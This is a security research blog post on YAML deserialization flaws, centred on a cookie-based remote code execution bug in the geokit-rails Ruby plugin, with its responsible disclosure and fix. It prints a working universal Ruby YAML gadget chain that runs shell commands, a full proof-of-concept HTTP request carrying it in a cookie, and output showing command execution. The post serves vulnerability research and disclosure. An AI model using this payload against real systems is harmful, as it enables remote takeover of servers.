Skip to main content

Finding YAML Deserialization with Snyk Code

Written by
Headshot of Calum Hutton

Calum Hutton

February 23, 2023

0 mins read

I conducted some research to try and identify YAML Injection issues in open-source projects using Snyk Code. Though the vulnerability itself is not a new one, the potential impact of YAML Injection is high, which made it a good candidate for research. This research led to the discovery of several issues in open-source projects written in Python, PHP and Ruby. This article focuses on the issue found in geokit-rails version 2.3.2, a plugin for Ruby on Rails

YAML

YAML is more than a mere data interchange format such as JSON, the specification describes a number of advanced features that make it ripe for security investigation such as:

  • Custom tags (i.e. PyYAML)

  • Anchors and aliases

  • Merged attributes

  • Multiple-document streams

YAML can also be used to serialize binary data and arbitrary objects in various languages, potentially leading to deserialization vulnerabilities. These vulnerabilities are the target of this research, since successful exploitation often leads to Remote Code Execution (RCE).

YAML deserialization in Ruby

In Ruby, YAML parsing is built into the core language, so no additional libraries are needed. If an application uses the builtin Ruby YAML parser, it is vulnerable to deserialization attacks if YAML.load() or YAML.load_file() is used instead of YAML.safe_load() or YAML.safe_load_file(), respectively. An alternative, safe-by-default YAML parser is available in the SafeYAML project.

The following script and output demonstrate an unsafe way to load YAML with YAML.load().

require 'yaml'

var = {
 id: 1,
 desc: 'A simple hash'
}

yaml = '---
:id: 1
:desc: A simple hash'

puts var
puts YAML.load(yaml)

# Prints:

{:id=>1, :desc=>"A simple hash"}
{:id=>1, :desc=>"A simple hash"}

The var variable holds a simple Ruby hash, with the yaml variable containing the equivalent hash, serialized in YAML form. Both putsstatements display the same hash, because the yaml variable has been deserialized back from a YAML string into a hash via YAML.load(). More complex objects can also be serialized and deserialized in this way. 

During the initial stages of this research, I came across a Universal Ruby YAML deserialization gadget that was effective on Ruby versions 2.x to 3.x. which, when deserialized, would trigger arbitrary command execution.

---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: id
         method_id: :resolve

The above YAML payload will execute the id command upon deserialization if it is parsed via YAML.load() or YAML.load_file().

Case study: geokit-rails (2.3.2)

The geokit-rails gem is a plugin for Ruby on Rails that provides location services for the application. The plugin uses the unsafe YAML.load() method via the retrieve_location_from_cookie_or_service() method in geokit-rails/ip_geocode_lookup.rb:

# Uses the stored location value from the cookie if it exists.  If
# no cookie exists, calls out to the web service to get the location.
def retrieve_location_from_cookie_or_service
 return GeoLoc.new(YAML.load(cookies[:geo_location])) if cookies[:geo_location]
 location = Geocoders::MultiGeocoder.geocode(get_ip_address)
 return location.success ? location : nil
end

The data flowing into the unsafe YAML.load() method originates from the Ruby on Rails cookies parameter, which holds the cookies sent in the request. This is good news for an attacker as the cookies can be directly controlled by crafting the appropriate HTTP request. 

Proof of concept

I set up a Rails application running the geokit-rails plugin (version 2.3.2) on Ruby 3.0.0. The following HTTP request was sent to the application to exploit the issue. It includes the URL-encoded YAML payload in the geo_location cookie.

GET http://127.0.0.1:3000/vulns HTTP/1.1
Host: 127.0.0.1:3000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Content-Length: 0
Cookie: geo_location=---%0A-+%21ruby%2Fobject%3AGem%3A%3AInstaller%0A++++i%3A+x%0A-+%21ruby%2Fobject%3AGem%3A%3ASpecFetcher%0A++++i%3A+y%0A-+%21ruby%2Fobject%3AGem%3A%3ARequirement%0A++requirements%3A%0A++++%21ruby%2Fobject%3AGem%3A%3APackage%3A%3ATarReader%0A++++io%3A+%261+%21ruby%2Fobject%3ANet%3A%3ABufferedIO%0A++++++io%3A+%261+%21ruby%2Fobject%3AGem%3A%3APackage%3A%3ATarReader%3A%3AEntry%0A+++++++++read%3A+0%0A+++++++++header%3A+%22abc%22%0A++++++debug_output%3A+%261+%21ruby%2Fobject%3ANet%3A%3AWriteAdapter%0A+++++++++socket%3A+%261+%21ruby%2Fobject%3AGem%3A%3ARequestSet%0A+++++++++++++sets%3A+%21ruby%2Fobject%3ANet%3A%3AWriteAdapter%0A+++++++++++++++++socket%3A+%21ruby%2Fmodule+%27Kernel%27%0A+++++++++++++++++method_id%3A+%3Asystem%0A+++++++++++++git_set%3A+id%0A+++++++++method_id%3A+%3Aresolve; _my_rails_app_session=%2B48ny21MkgVzlJR4LMcsdNtOK0G1aHx0%2Byoz4xLnkaMHrCner7YSRfQ04notQ0oNesQdG4EV5T%2FpyrQBSKBdKOZLLvP2J1NLOAQe1Z5zTTuu5Grcw1wuRpIHKAmZjfj3bqKqghkOj1JpOBxJoxFS7L6cH3wIsoq%2FrK%2BlAxVvP%2F8F9g5Q%2FA3pLVj2DTF3l7CcDBzOE9cPCOShesP717YbZNoa%2BPNf3mGjmKWvq26Y3CKMg2z7mAJHA%2B0CdA9l2pXsbrgwRJUW3Epqx4eJt0%2FDCJgS6Mp7rGjQeoIqLj4%3D--YAEA%2FepI0t701ifo--fVitYcX5PORz3a9xN4ev4A%3D%3D; __profilin=p%3Dt

Within the Rails application, the payload was deserialized and executed, running the id command to prove command execution.

Started GET "/vulns" for 127.0.0.1 at 2022-11-07 12:05:57 +0000 Processing by VulnsController#index as HTML 
sh: reading: command not found 
uid=501(calumh) gid=20(staff) groups=20(staff),12(everyone),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),701(com.apple.sharepoint.group.1),33(_appstore),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),398(com.apple.access_screensharing),399(com.apple.access_ssh),400(com.apple.access_remote_ae) 
Completed 500 Internal Server Error in 167ms (Allocations: 35610)

For a system utilizing geokit-rails, an attacker exploiting this vulnerability could initiate RCE, potentially allowing for total system takeover. 

Remediation

This issue was responsibly disclosed to the maintainer of geokit-rails and was fixed in version 2.5.0 of the software by replacing the YAML containing the coordinate information with JSON. From this research, Snyk Code’s rules to detect YAML injection were improved and enhanced, meaning even more of these issues should now be detectable in user projects. 

Get started in capture the flag

Learn how to solve capture the flag challenges by watching our virtual 101 workshop on demand.